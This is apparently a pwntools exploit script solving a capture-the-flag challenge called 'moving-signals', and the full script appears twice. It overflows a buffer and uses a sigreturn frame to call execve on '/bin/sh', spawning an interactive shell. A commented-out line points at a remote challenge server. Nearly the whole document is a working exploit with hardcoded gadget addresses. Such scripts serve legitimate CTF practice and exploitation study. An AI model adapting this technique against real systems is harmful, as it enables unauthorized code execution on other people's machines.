lionaneesh/solve_moving-signals.py

## solve_moving-signals.py
from pwn import *
binary = ELF("./moving-signals")
pr = process("./moving-signals")
#pr = remote("161.97.176.150", 2525)
buff = 0x7ffd4ac736b0
pop_rax_ret = 0x0000000000041018
binshstr = 0x41250
syscall_ret = 0x41015
frame = SigreturnFrame(arch="amd64", kernel="amd64")
frame.rax = 59
frame.rdi = binshstr
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0xdeadbeef
frame.rip = syscall_ret


offset = 8
length = 500
p = b"A" * offset + p64(pop_rax_ret)
p += p64(0xf)
p += p64(syscall_ret)
p += bytes(frame)

raw_input("Waiting!")
pr.sendline(p)

pr.interactive()
	from pwn import *
	binary = ELF("./moving-signals")
	pr = process("./moving-signals")
	#pr = remote("161.97.176.150", 2525)
	buff = 0x7ffd4ac736b0
	pop_rax_ret = 0x0000000000041018
	binshstr = 0x41250
	syscall_ret = 0x41015
	frame = SigreturnFrame(arch="amd64", kernel="amd64")
	frame.rax = 59
	frame.rdi = binshstr
	frame.rsi = 0
	frame.rdx = 0
	frame.rsp = 0xdeadbeef
	frame.rip = syscall_ret


	offset = 8
	length = 500
	p = b"A" * offset + p64(pop_rax_ret)
	p += p64(0xf)
	p += p64(syscall_ret)
	p += bytes(frame)

	raw_input("Waiting!")
	pr.sendline(p)

	pr.interactive()